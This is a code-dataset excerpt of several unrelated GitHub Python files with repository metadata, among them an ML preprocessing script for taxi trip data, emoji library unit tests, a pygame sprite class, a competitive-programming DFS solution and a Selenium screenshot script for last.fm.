input(\"requested text: \")\n return create_text\n\ndef play_mp3_content():\n os.system('sudo amixer cset numid=1 100%')\n pygame.init()\n pygame.mixer.init()\n pygame.mixer.music.load('text.mp3')\n pygame.mixer.music.play()\n #pygame.event.wait()\n print(\"end of script\")\n os.system('sudo amixer cset numid=1 85%')\n#text_send_to_server()\n","repo_name":"sollarp/Netflix_Voice_Command","sub_path":"Support/text_to_speech_helper.py","file_name":"text_to_speech_helper.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72352917493","text":"import pandas as pd\nimport pickle\nfrom sklearn.feature_extraction import DictVectorizer\nimport os\n\nclass ProcessingData:\n \"\"\"\n A class for processing and pre-processing 
data.\n\n Attributes:\n None\n\n Methods:\n dump_pickle(obj, filename):\n Dump an object to a pickle file.\n\n read_dataframe(filename):\n Read and preprocess a DataFrame from a file.\n\n preprocess(df, dv, fit_dv=False):\n Preprocess the DataFrame and return transformed data.\n\n run(dest_path=\"data_model_input\", dataset=\"green\", raw_data_path=\"data\"):\n Process the dataset and save preprocessed data and artifacts.\n \"\"\"\n def __init__(self):\n pass\n \n def dump_pickle(self, obj:object, filename: str):\n \"\"\"\n Dump an object to a pickle file.\n\n Args:\n obj (object): The object to dump.\n filename (str): The name of the output pickle file.\n Returns:\n None\n \"\"\"\n with open(filename, \"wb\") as f_out:\n return pickle.dump(obj, f_out)\n \n def read_dataframe(self, filename: str):\n \"\"\"\n Read and preprocess a DataFrame from a file.\n\n Args:\n filename (str): The name of the input data file.\n\n Returns:\n pd.DataFrame: Preprocessed DataFrame.\n \"\"\"\n df = pd.read_parquet(filename)\n df['duration'] = df.lpep_dropoff_datetime - df.lpep_pickup_datetime\n df.duration = df.duration.apply(lambda td: td.total_seconds() / 60)\n df = df[(df.duration >= 1) & (df.duration <= 60)]\n categorical = ['PULocationID', 'DOLocationID']\n df[categorical] = df[categorical].astype(str)\n return df\n \n def preprocess(self, df: pd.DataFrame, dv: DictVectorizer, fit_dv: bool = False):\n \"\"\"\n Preprocess the DataFrame and return transformed data.\n\n Args:\n df (pd.DataFrame): The input DataFrame.\n dv (DictVectorizer): The DictVectorizer for categorical feature encoding.\n fit_dv (bool, optional): Whether to fit the DictVectorizer. Defaults to False.\n\n Returns:\n tuple: A tuple containing transformed data and the fitted DictVectorizer.\n \"\"\"\n df['PU_DO'] = df['PULocationID'] + '_' + df['DOLocationID']\n categorical = ['PU_DO']\n numerical = ['trip_distance']\n dicts = df[categorical + numerical].to_dict(orient='records')\n if fit_dv:\n X = dv.fit_transform(dicts)\n else:\n X = dv.transform(dicts)\n return X, dv\n \n def run(self, dest_path = \"data_model_input\", dataset = \"green\", raw_data_path = \"data\"): \n #\n\n \"\"\"\n Process the dataset and save preprocessed data and artifacts.\n\n Args:\n dest_path (str, optional): The destination path for saving preprocessed data. Defaults to \"data_model_input\".\n dataset (str, optional): The dataset to process. Defaults to \"green\".\n raw_data_path (str, optional): The path to raw data files. 
Defaults to \"data\".\n\n Returns:\n None\n \"\"\"\n \n df_train = self.read_dataframe(\n os.path.join(raw_data_path, f\"{dataset}_tripdata_2023-01.parquet\")\n )\n df_valid = self.read_dataframe(\n os.path.join(raw_data_path, f\"{dataset}_tripdata_2023-02.parquet\")\n )\n df_test = self.read_dataframe(\n os.path.join(raw_data_path, f\"{dataset}_tripdata_2023-03.parquet\")\n )\n print(df_test.shape)\n\n target = 'duration'\n y_train = df_train[target].values\n y_valid = df_valid[target].values\n y_test = df_test[target].values\n\n dv = DictVectorizer()\n X_train, dv = self.preprocess(df_train, dv, fit_dv=True)\n X_valid, _ = self.preprocess(df_valid, dv, fit_dv=False)\n X_test, _ = self.preprocess(df_test, dv, fit_dv=False)\n\n os.makedirs(dest_path, exist_ok=True)\n\n self.dump_pickle(dv, os.path.join(dest_path, \"dv.pkl\"))\n self.dump_pickle((X_train, y_train), os.path.join(dest_path, \"train.pkl\"))\n self.dump_pickle((X_valid, y_valid), os.path.join(dest_path, \"valid.pkl\"))\n self.dump_pickle((X_test, y_test), os.path.join(dest_path, \"test.pkl\"))\n\n \nif __name__ == '__main__':\n data_processor = ProcessingData()\n data_processor.run()\n","repo_name":"Mariac-db/MLOpsAvanzado","sub_path":"04-model_tracking_mlflow/duration_predictions.py","file_name":"duration_predictions.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73791533174","text":"# -*- coding: UTF-8 -*-\n\n\n\"\"\"Unittests for emoji.core\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport random\nimport re\nimport emoji\nimport pytest\n\n\ndef ascii(s):\n # return escaped Code points \\U000AB123\n return s.encode(\"unicode-escape\").decode()\n\n\ndef test_emojize_name_only():\n for lang_code, emoji_pack in emoji.EMOJI_UNICODE.items():\n for name in emoji_pack.keys():\n actual = emoji.emojize(name, False, language=lang_code)\n expected = emoji_pack[name]\n assert expected == actual, '%s != %s' % (expected, actual)\n\n\ndef test_emojize_complicated_string():\n # A bunch of emoji's with UTF-8 strings to make sure the regex expression is functioning\n name_code = {\n ':flag_for_Ceuta_&_Melilla:': u'\\U0001F1EA\\U0001F1E6',\n ':flag_for_St._Barthélemy:': u'\\U0001F1E7\\U0001F1F1',\n ':flag_for_Côte_d’Ivoire:': u'\\U0001F1E8\\U0001F1EE',\n ':flag_for_Åland_Islands:': u'\\U0001F1E6\\U0001F1FD',\n ':flag_for_São_Tomé_&_Príncipe:': u'\\U0001F1F8\\U0001F1F9',\n ':flag_for_Curaçao:': u'\\U0001F1E8\\U0001F1FC'\n }\n string = ' complicated! 
'.join(list(name_code.keys()))\n actual = emoji.emojize(string, False)\n expected = string\n for name, code in name_code.items():\n expected = expected.replace(name, code)\n expected = emoji.emojize(actual, False)\n assert expected == actual, '%s != %s' % (expected, actual)\n\n\ndef test_emojize_languages():\n for lang_code, emoji_pack in emoji.EMOJI_UNICODE.items():\n for name, emj in emoji_pack.items():\n assert emoji.emojize(name, language=lang_code) == emj\n\n\ndef test_demojize_languages():\n for lang_code, emoji_pack in emoji.EMOJI_UNICODE.items():\n for name, emj in emoji_pack.items():\n assert emoji.demojize(emj, language=lang_code) == name\n\n\ndef test_emojize_variant():\n def remove_variant(s): return re.sub(u'[\\ufe0e\\ufe0f]$', '', s)\n\n assert emoji.emojize(\n ':Taurus:', variant=None) == emoji.EMOJI_UNICODE['en'][':Taurus:']\n assert emoji.emojize(':Taurus:', variant=None) == emoji.emojize(':Taurus:')\n assert emoji.emojize(':Taurus:', variant='text_type') == remove_variant(\n emoji.EMOJI_UNICODE['en'][':Taurus:']) + u'\\ufe0e'\n assert emoji.emojize(':Taurus:', variant='emoji_type') == remove_variant(\n emoji.EMOJI_UNICODE['en'][':Taurus:']) + u'\\ufe0f'\n\n assert emoji.emojize(\n ':admission_tickets:', variant=None) == emoji.EMOJI_UNICODE['en'][':admission_tickets:']\n assert emoji.emojize(':admission_tickets:', variant=None) == emoji.emojize(\n ':admission_tickets:')\n assert emoji.emojize(':admission_tickets:', variant='text_type') == remove_variant(\n emoji.EMOJI_UNICODE['en'][':admission_tickets:']) + u'\\ufe0e'\n assert emoji.emojize(':admission_tickets:', variant='emoji_type') == remove_variant(\n emoji.EMOJI_UNICODE['en'][':admission_tickets:']) + u'\\ufe0f'\n\n with pytest.raises(ValueError):\n emoji.emojize(':admission_tickets:', variant=False)\n\n with pytest.raises(ValueError):\n emoji.emojize(':admission_tickets:', variant=True)\n\n with pytest.raises(ValueError):\n emoji.emojize(':admission_tickets:', variant='wrong')\n\n assert emoji.emojize(\":football:\", use_aliases=False) == ':football:'\n assert emoji.emojize(\":football:\", variant=\"text_type\",\n use_aliases=False) == ':football:'\n assert emoji.emojize(\":football:\", use_aliases=True) == u'\\U0001F3C8'\n assert emoji.emojize(\":football:\", variant=\"emoji_type\",\n use_aliases=True) == u'\\U0001F3C8'\n\n\ndef test_demojize_removes_variant():\n # demojize should remove all variant indicators \\ufe0e and \\ufe0f from the string\n text = \"\".join([emoji.emojize(':Taurus:', variant='text_type'),\n emoji.emojize(':Taurus:', variant='emoji_type'),\n emoji.emojize(':admission_tickets:', variant='text_type'),\n emoji.emojize(':admission_tickets:', variant='emoji_type'),\n emoji.emojize(':alien:', variant='text_type'),\n emoji.emojize(':alien:', variant='emoji_type'),\n emoji.emojize(':atom_symbol:', variant='text_type'),\n emoji.emojize(':atom_symbol:', variant='emoji_type')])\n\n for lang_code in emoji.UNICODE_EMOJI:\n result = emoji.demojize(text, language=lang_code)\n assert '\\ufe0e' not in result\n assert '\\ufe0f' not in result\n\n\ndef test_emojize_invalid_emoji():\n string = '__---___--Invalid__--__-Name'\n assert emoji.emojize(string, False) == string\n\n string = ':: baby:: :_: : : : : :-: :+:'\n assert emoji.emojize(string, False) == string\n\n\ndef test_alias():\n # When use_aliases=False aliases should be passed through untouched\n assert emoji.emojize(':soccer:', use_aliases=False) == ':soccer:'\n assert emoji.emojize(':soccer:', use_aliases=True) == u'\\U000026BD'\n assert 
emoji.emojize(':football:', use_aliases=False) == ':football:'\n assert emoji.emojize(':football:', use_aliases=True) == u'\\U0001F3C8'\n # Multiple aliases for one emoji:\n assert emoji.emojize(':thumbsup:', use_aliases=True) == emoji.emojize(\n ':+1:', use_aliases=True)\n assert emoji.emojize(':thumbsup:', use_aliases=True) == emoji.emojize(\n ':thumbs_up:', use_aliases=True)\n assert emoji.emojize(':thumbsup:', use_aliases=True) == u'\\U0001f44d'\n\n thumbsup = u'\\U0001f44d'\n assert emoji.demojize(thumbsup, use_aliases=True) != thumbsup\n assert emoji.demojize(thumbsup, use_aliases=True) != ':thumbs_up:'\n assert emoji.demojize(thumbsup, use_aliases=True) != emoji.demojize(\n thumbsup, use_aliases=False)\n\n thailand = u'🇹🇭'\n assert emoji.demojize(thailand, use_aliases=True) != thailand\n assert emoji.demojize(thailand, use_aliases=True) != ':Thailand:'\n assert emoji.demojize(thailand, use_aliases=True) != emoji.demojize(\n thailand, use_aliases=False)\n assert emoji.demojize(thailand, use_aliases=True, version=1.0) != emoji.demojize(\n thailand, use_aliases=True)\n\n # No alias\n for emj, emoji_data in emoji.EMOJI_DATA.items():\n if emoji_data['status'] != emoji.STATUS['fully_qualified']:\n continue\n if 'alias' not in emoji_data:\n assert emoji.emojize(emoji_data['en'], use_aliases=True) != emoji_data['en']\n assert emoji.demojize(emj, use_aliases=True) == emoji_data['en']\n\n # language='alias'\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=True, language=\"en\") == thailand\n assert emoji.emojize(':flag_for_Thailand:', language=\"alias\") == thailand\n assert emoji.emojize(':flag_for_Thailand:', language=\"alias\", use_aliases=True) == thailand\n assert emoji.demojize(thailand, use_aliases=True, language=\"en\") == ':flag_for_Thailand:'\n assert emoji.demojize(thailand, language=\"alias\") ==':flag_for_Thailand:'\n assert emoji.demojize(thailand, language=\"alias\", use_aliases=True) ==':flag_for_Thailand:'\n\n\ndef test_invalid_alias():\n # Invalid aliases should be passed through untouched\n assert emoji.emojize(':tester:', use_aliases=True) == ':tester:'\n assert emoji.emojize(':footbal:', use_aliases=True) == ':footbal:'\n assert emoji.emojize(':socer:', use_aliases=True) == ':socer:'\n assert emoji.emojize(':socer:', use_aliases=True,\n variant=\"text_type\") == ':socer:'\n\n\ndef test_alias_wrong_language():\n # Alias with wrong languages\n thailand = u'🇹🇭'\n with pytest.warns(UserWarning) as w:\n emoji.emojize(':flag_for_Thailand:', use_aliases=True, language=\"es\")\n with pytest.warns(UserWarning) as w:\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=True, language=\"de\") == thailand\n with pytest.warns(UserWarning) as w:\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=True, language=\"es\") == thailand\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=False, language=\"es\") == ':flag_for_Thailand:'\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=True, language=\"en\") == thailand\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=False, language=\"alias\") == thailand\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=True, language=\"alias\") == thailand\n\n with pytest.warns(UserWarning) as w:\n emoji.demojize(thailand, use_aliases=True, language=\"es\")\n with pytest.warns(UserWarning) as w:\n assert emoji.demojize(thailand, use_aliases=True, language=\"es\") == ':flag_for_Thailand:'\n assert emoji.demojize(thailand, use_aliases=False, language=\"es\") == ':bandera_tailandia:'\n assert 
emoji.demojize(thailand, use_aliases=True, language=\"en\") == ':flag_for_Thailand:'\n assert emoji.demojize(thailand, use_aliases=False, language=\"alias\") == ':flag_for_Thailand:'\n assert emoji.demojize(thailand, use_aliases=True, language=\"alias\") == ':flag_for_Thailand:'\n\n\ndef test_demojize_name_only():\n for emj, item in emoji.EMOJI_DATA.items():\n if item['status'] != emoji.STATUS['fully_qualified']:\n continue\n for lang_code in emoji.UNICODE_EMOJI:\n if not lang_code in item:\n continue\n name = item[lang_code]\n oneway = emoji.emojize(name, use_aliases=False, language=lang_code)\n assert oneway == emj\n roundtrip = emoji.demojize(oneway, language=lang_code)\n assert name == roundtrip, '%s != %s' % (name, roundtrip)\n\n\ndef test_demojize_complicated_string():\n constructed = u'testing :baby::emoji_modifier_fitzpatrick_type-3: with :eyes: :eyes::eyes: modifiers :baby::emoji_modifier_fitzpatrick_type-5: to symbols ヒㇿ'\n emojid = emoji.emojize(constructed)\n destructed = emoji.demojize(emojid)\n assert constructed == destructed, '%s != %s' % (constructed, destructed)\n\n\ndef test_demojize_delimiters():\n for e in [u'\\U000026BD', u'\\U0001f44d', u'\\U0001F3C8']:\n for d in [(\":\", \":\"), (\"a\", \"b\"), (\"!\", \"!!\"), (\"123\", \"456\"), (u\"😁\", u\"👌\")]:\n s = emoji.demojize(e, delimiters=d)\n assert s.startswith(d[0])\n assert s.endswith(d[1])\n\n text = u\"Example of a text with an emoji%sin a sentence\"\n for e in [u'\\U000026BD', u'\\U0001f44d', u'\\U0001F3C8']:\n for d in [(\":\", \":\"), (\"!\", \"-!-\"), (\"-\", \"-\"), (\":\", \"::\"), (\"::\", \"::\"), (u\"😁\", u\"👌\")]:\n text_with_unicode = text % e\n demojized_text = emoji.demojize(text_with_unicode, delimiters=d)\n assert text_with_unicode != demojized_text\n assert e not in demojized_text\n assert emoji.emojize(demojized_text, delimiters=d) == text_with_unicode\n text_with_emoji = text % emoji.demojize(e, delimiters=d)\n assert demojized_text == text_with_emoji\n assert emoji.emojize(text_with_emoji, delimiters=d) == text_with_unicode\n\n\ndef test_emoji_lis():\n assert emoji.emoji_lis('Hi, I am 👌 test')[0]['location'] == 9\n assert emoji.emoji_lis('Hi') == []\n if len('Hello 🇫🇷👌') < 10: # skip these tests on python with UCS-2 as the string length/positions are different\n assert emoji.emoji_lis('Hi, I am fine. 😁') == [\n {'location': 15, 'emoji': '😁'}]\n assert emoji.emoji_lis('Hello 🇫🇷👌') == [\n {'emoji': '🇫🇷', 'location': 6}, {'emoji': '👌', 'location': 8}]\n\n\ndef test_distinct_emoji_lis():\n assert emoji.distinct_emoji_lis('Hi, I am fine. 😁') == ['😁']\n assert emoji.distinct_emoji_lis('Hi') == []\n assert set(emoji.distinct_emoji_lis('Hello 🇫🇷👌')) == {'🇫🇷', '👌'}\n assert emoji.distinct_emoji_lis('Hi, I am fine. 😁😁😁😁') == ['😁']\n\n\ndef test_emoji_list():\n assert emoji.emoji_list('Hi, I am 👌 test')[0]['match_start'] == 9\n assert emoji.emoji_list('Hi') == []\n if len('Hello 🇫🇷👌') < 10: # skip these tests on python with UCS-2 as the string length/positions are different\n assert emoji.emoji_list('Hi, I am fine. 😁') == [\n {'match_start': 15, 'match_end': 16, 'emoji': '😁'}]\n assert emoji.emoji_list('Hello 🇫🇷👌') == [\n {'emoji': '🇫🇷', 'match_start': 6, 'match_end': 8}, {'emoji': '👌', 'match_start': 8, 'match_end': 9}]\n\n\ndef test_distinct_emoji_list():\n assert emoji.distinct_emoji_list('Hi, I am fine. 😁') == ['😁']\n assert emoji.distinct_emoji_list('Hi') == []\n assert set(emoji.distinct_emoji_list('Hello 🇫🇷👌')) == {'🇫🇷', '👌'}\n assert emoji.distinct_emoji_list('Hi, I am fine. 
😁😁😁😁') == ['😁']\n\n\ndef test_emoji_count():\n assert emoji.emoji_count('Hi, I am fine. 😁') == 1\n assert emoji.emoji_count('Hi') == 0\n assert emoji.emoji_count('Hello 🇫🇷👌') == 2\n assert emoji.emoji_count('Hello 🇵🇱🍺🇵🇱', unique=True) == 2\n\n\ndef test_replace_emoji():\n assert emoji.replace_emoji(u'Hi, I am fine. 😁') == 'Hi, I am fine. '\n assert emoji.replace_emoji('Hi') == 'Hi'\n assert emoji.replace_emoji('Hello 🇫🇷👌') == 'Hello '\n assert emoji.replace_emoji('Hello 🇫🇷👌', 'x') == 'Hello xx'\n\n def replace(emj, data):\n assert emj in [\"🇫🇷\", \"👌\"]\n return 'x'\n assert emoji.replace_emoji('Hello 🇫🇷👌', replace) == 'Hello xx'\n\n\ndef test_is_emoji():\n assert emoji.is_emoji('😁')\n assert not emoji.is_emoji('H')\n assert emoji.is_emoji('🇫🇷')\n\n\ndef test_long_emoji():\n assert emoji.demojize('This is \\U0001F9D1\\U0001F3FC\\U0000200D\\U0001F37C example text') == 'This is :person_feeding_baby_medium-light_skin_tone: example text'\n assert emoji.demojize('This is \\U0001f468\\U0001f3ff\\u200d\\u2764\\ufe0f\\u200d\\U0001f468\\U0001f3ff example text \\U0001F469\\U0001F3FB\\U0000200D\\U0001F91D\\U0000200D\\U0001F468\\U0001F3FF') == 'This is :couple_with_heart_man_man_dark_skin_tone: example text :woman_and_man_holding_hands_light_skin_tone_dark_skin_tone:'\n assert emoji.demojize('This is \\U0001f468\\U0001f3ff\\u200d\\u2764\\ufe0f\\u200d\\U0001f468\\U0001f3ff\\U0001f468\\U0001f3ff\\u200d\\u2764\\ufe0f\\u200d\\U0001f48b\\u200d\\U0001f468\\U0001f3ff example text \\U0001F469\\U0001F3FB\\U0000200D\\U0001F91D\\U0000200D\\U0001F468\\U0001F3FF') == 'This is :couple_with_heart_man_man_dark_skin_tone::kiss_man_man_dark_skin_tone: example text :woman_and_man_holding_hands_light_skin_tone_dark_skin_tone:'\n assert emoji.demojize('\\U0001F46B\\U0001F3FB This is \\U0001f468\\U0001f3ff\\U0001f468\\U0001f3ff\\u200d\\u2764\\ufe0f\\u200d\\U0001f468\\U0001f3ff\\U0001f468\\U0001f3ff\\u200d\\u2764\\ufe0f\\u200d\\U0001f48b\\u200d\\U0001f468\\U0001f3ff example text \\U0001F469\\U0001F3FB\\U0000200D\\U0001F91D\\U0000200D\\U0001F468\\U0001F3FF') == ':woman_and_man_holding_hands_light_skin_tone: This is :man_dark_skin_tone::couple_with_heart_man_man_dark_skin_tone::kiss_man_man_dark_skin_tone: example text :woman_and_man_holding_hands_light_skin_tone_dark_skin_tone:'\n assert emoji.demojize('\\U0001F46B\\U0001F3FB\\U0001F46B\\U0001F3FB\\U0001F469\\U0001F3FB\\U0000200D\\U0001F91D\\U0000200D\\U0001F468\\U0001F3FF\\U0001FAF1\\U0001F3FD\\U0001FAF1\\U0001F3FD\\U0000200D\\U0001FAF2\\U0001F3FF') == ':woman_and_man_holding_hands_light_skin_tone::woman_and_man_holding_hands_light_skin_tone::woman_and_man_holding_hands_light_skin_tone_dark_skin_tone::rightwards_hand_medium_skin_tone::handshake_medium_skin_tone_dark_skin_tone:'\n s = \":crossed_fingers_medium-light_skin_tone::crossed_fingers::crossed_fingers_dark_skin_tone:\"\n assert emoji.demojize(emoji.demojize(s)) == s\n\n\ndef test_untranslated():\n for emj, item in emoji.EMOJI_DATA.items():\n if item['status'] != emoji.STATUS['fully_qualified']:\n continue\n if 'es' not in item:\n # untranslated\n value = emoji.emojize(item['en'], language='en')\n roundtrip = emoji.demojize(value, language='es')\n assert roundtrip == value, '%s != %s (from %s)' % (ascii(roundtrip), ascii(value), item['en'])\n else:\n # translated\n value = emoji.emojize(item['en'], language='en')\n roundtrip = emoji.demojize(value, language='es')\n assert roundtrip == item['es'], '%s != %s' % (roundtrip, item['es'])\n\n\ndef test_text():\n UCS2 = len('Hello 🇫🇷👌') > 9 # don't break up characters on 
python with UCS-2\n\n text = u\"\"\"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.\nUt enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.\nDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.\nExcepteur sint occaecat in reprehenderit in cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\nStróż pchnął kość w quiz gędźb vel fax myjń.\nHøj bly gom vandt fræk sexquiz på wc.\nСъешь же ещё этих мягких французских булок, да выпей чаю.\nЗа миг бях в чужд плюшен скърцащ фотьойл.\nهلا سكنت بذي ضغثٍ فقد زعموا — شخصت تطلب ظبياً راح مجتازا\nשפן אכל קצת גזר בטעם חסה, ודי\nऋषियों को सताने वाले दुष्ट राक्षसों के राजा रावण का सर्वनाश करने वाले विष्णुवतार भगवान श्रीराम, अयोध्या के महाराज दशरथ के बड़े सपुत्र थे।\nとりなくこゑす ゆめさませ みよあけわたる ひんかしを そらいろはえて おきつへに ほふねむれゐぬ もやのうち\n視野無限廣,窗外有藍天\nDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.\nExcepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\"\"\"\n\n def add_random_emoji(text, lst, select=lambda emj_data: emj_data['en']):\n\n text = text\n\n emoji_list = []\n text_with_unicode = u\"\"\n text_with_placeholder = u\"\"\n for i in range(0, len(text), 10):\n while True:\n emj, emj_data = random.choice(lst)\n placeholder = select(emj_data)\n if placeholder:\n break\n\n if UCS2:\n j = text.find(u\" \", i, i + 10)\n if j == -1:\n continue\n else:\n j = random.randint(i, i + 10)\n\n text_with_unicode += text[i:j]\n text_with_unicode += emj\n text_with_unicode += text[j:i + 10]\n\n text_with_placeholder += text[i:j]\n text_with_placeholder += placeholder\n text_with_placeholder += text[j:i + 10]\n\n emoji_list.append(emj)\n\n return text_with_unicode, text_with_placeholder, emoji_list\n\n def clean(s):\n return s.replace(u'\\u200d', '').replace(u'\\ufe0f', '')\n\n all_emoji_list = list(emoji.EMOJI_DATA.items())\n qualified_emoji_list = list((emj, item) for emj, item in emoji.EMOJI_DATA.items() if item['status'] == emoji.STATUS['fully_qualified'])\n\n # qualified emoji\n text_with_unicode, text_with_placeholder, emoji_list = add_random_emoji(text, qualified_emoji_list)\n assert emoji.demojize(text_with_unicode) == text_with_placeholder\n assert emoji.emojize(text_with_placeholder) == text_with_unicode\n if not UCS2:\n assert emoji.replace_emoji(text_with_unicode, u'') == text\n assert set(emoji.distinct_emoji_lis(text_with_unicode)) == set(emoji_list)\n for i, lis in enumerate(emoji.emoji_lis(text_with_unicode)):\n assert lis['emoji'] == emoji_list[i]\n\n # qualified emoji from \"es\"\n selector = lambda emoji_data: emoji_data[\"es\"] if \"es\" in emoji_data else False\n text_with_unicode, text_with_placeholder, emoji_list = add_random_emoji(text, qualified_emoji_list, selector)\n assert emoji.demojize(text_with_unicode, language=\"es\") == text_with_placeholder\n assert emoji.emojize(text_with_placeholder, language=\"es\") == text_with_unicode\n if not UCS2:\n assert emoji.replace_emoji(text_with_unicode, u'') == text\n assert set(emoji.distinct_emoji_lis(text_with_unicode)) == set(emoji_list)\n for i, lis in enumerate(emoji.emoji_lis(text_with_unicode)):\n assert lis['emoji'] == emoji_list[i]\n\n # qualified emoji from \"alias\"\n selector = lambda emoji_data: emoji_data[\"alias\"][0] if \"alias\" in emoji_data else False\n text_with_unicode, 
text_with_placeholder, emoji_list = add_random_emoji(text, qualified_emoji_list, selector)\n assert emoji.demojize(text_with_unicode, use_aliases=True) == text_with_placeholder\n assert emoji.emojize(text_with_placeholder, use_aliases=True) == text_with_unicode\n if not UCS2:\n assert emoji.replace_emoji(text_with_unicode, u'') == text\n assert set(emoji.distinct_emoji_lis(text_with_unicode)) == set(emoji_list)\n for i, lis in enumerate(emoji.emoji_lis(text_with_unicode)):\n assert lis['emoji'] == emoji_list[i]\n\n # all emoji\n text_with_unicode, text_with_placeholder, emoji_list = add_random_emoji(text, all_emoji_list)\n assert emoji.demojize(text_with_unicode) == text_with_placeholder\n assert clean(emoji.emojize(text_with_placeholder)) == clean(text_with_unicode)\n if not UCS2:\n assert emoji.replace_emoji(text_with_unicode, u'') == text\n assert set(emoji.distinct_emoji_lis(text_with_unicode)) == set(emoji_list)\n for i, lis in enumerate(emoji.emoji_lis(text_with_unicode)):\n assert lis['emoji'] == emoji_list[i]\n\n\ndef test_text_multiple_times():\n # Run test_text() multiple times because it relies on a random text\n for i in range(100):\n test_text()\n\n\ndef test_invalid_chars():\n invalidchar = u\"\\U0001F20F\"\n assert emoji.demojize(invalidchar) == invalidchar, \"%r != %r\" % (ascii(emoji.demojize(invalidchar)), ascii(invalidchar))\n\n invalidchar = u\"u\\2302 ⌂\"\n assert emoji.demojize(invalidchar) == invalidchar, \"%r != %r\" % (ascii(emoji.demojize(invalidchar)), ascii(invalidchar))\n\n\ndef test_combine_with_component():\n text = u\"Example of a combined emoji%sin a sentence\"\n\n combined = emoji.emojize(text % u\":woman_dark_skin_tone:\")\n separated = emoji.emojize(text % u\":woman::dark_skin_tone:\")\n assert combined == separated, \"%r != %r\" % (ascii(combined), ascii(separated))\n\n combined = emoji.emojize(text % u\":woman_dark_skin_tone_white_hair:\")\n separated = emoji.emojize(text % u\":woman::dark_skin_tone:\\u200d:white_hair:\")\n assert combined == separated, \"%r != %r\" % (ascii(combined), ascii(separated))\n","repo_name":"ivanDourado/guanabaraPython","sub_path":"mundo1/emoji-1.7.0/tests/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":23006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42656624288","text":"import pygame\nfrom bullet import Bullet\n\nclass Player(pygame.sprite.Sprite):\n\n def __init__(self, pos):\n super().__init__()\n # self.image = pygame.Surface((32, 64))\n # self.image.fill(\"red\")\n self.image = pygame.image.load(\"/Users/ben/PycharmProjects/pythonProject3/prototype1/graphics/player/galaga.png\")\n self.rect = self.image.get_rect(topleft=pos)\n self.direction = pygame.math.Vector2(0, 0)\n self.speed = 8\n\n self.bullets = pygame.sprite.Group()\n\n #SHOOTING\n self.firing = False\n\n\n def get_input(self):\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_RIGHT]:\n self.direction.x = 1\n elif keys[pygame.K_LEFT]:\n self.direction.x = -1\n elif keys[pygame.K_UP]:\n self.direction.y = -1\n elif keys[pygame.K_DOWN]:\n self.direction.y = 1\n else:\n self.direction.x = 0\n self.direction.y = 0\n if keys[pygame.K_SPACE] and not self.firing:\n self.fire()\n self.firing = True\n elif not keys 
[pygame.K_SPACE] and self.firing:\n self.firing = False\n\n def fire(self):\n bullet = Bullet((self.rect.centerx, self.rect.centery), self.direction.x)\n self.bullets.add(bullet)\n\n def update(self, enemies):\n self.get_input()\n self.rect.x += self.direction.x * self.speed\n self.rect.y += self.direction.y * self.speed\n self.bullets.update()\n\n def draw_bullets(self, surface):\n self.bullets.draw(surface)\n","repo_name":"superhippo9/pythonProject3","sub_path":"prototype1/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72160614454","text":"# Got AC after switching from PyPy to Python 3.8.2...\nimport sys\nsys.setrecursionlimit(10**9)\n \n\nclass Node:\n def __init__(self, idx) -> None:\n self.idx = idx\n self.checked = False\n self.dests = []\n \n\ndef run(n,x,y,uv):\n nodes = []\n for i in range(n+1):\n nodes.append(Node(i))\n \n for e in uv:\n nodes[e[0]].dests.append(e[1])\n nodes[e[1]].dests.append(e[0])\n \n n = nodes[x]\n\n # plain DFS gave a few TLEs and a few WAs... at first I had no idea why the WAs happened\n # -> apparently splitting edges into parents and children is what broke it; the WAs are gone now, though the TLEs did not change\n if dfs(nodes, y, n):\n ans.append(x)\n ans.reverse()\n \n # print(' '.join(map(str, ans)))\n print(*ans)\n\n\nans = []\ndef dfs(nodes, y, node):\n node.checked = True\n if y in node.dests:\n ans.append(y)\n return True\n \n for d in node.dests:\n node = nodes[d]\n if node.checked:\n continue\n if dfs(nodes, y, node):\n ans.append(node.idx)\n return True\n\n\nif __name__ == '__main__':\n n,x,y = map(int, input().split())\n uv = [list(map(int, input().split())) for _ in range(n-1)]\n run(n,x,y,uv)","repo_name":"NozomiTakiguchi/atcoder","sub_path":"src/ABC270/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74621057333","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom datetime import date\nimport sys\nimport time\n\nuser_name = sys.argv[1]\n\noptions = webdriver.ChromeOptions()\noptions.headless = True\ndriver = webdriver.Chrome(options=options)\n\nURL = 'https://www.last.fm/user/'+user_name+'/listening-report/week'\n\ndriver.get(URL)\n\nbutton = driver.find_element_by_id('onetrust-accept-btn-handler')\nbutton.click()\n\nS = lambda l: driver.execute_script('return document.body.parentNode.scroll'+l)\ndriver.set_window_size(S('Width'),S('Height')) \ntime.sleep(3) \ndriver.find_element_by_tag_name('body').screenshot('lastfm_'+date.today().strftime(\"%Y %m %d\") 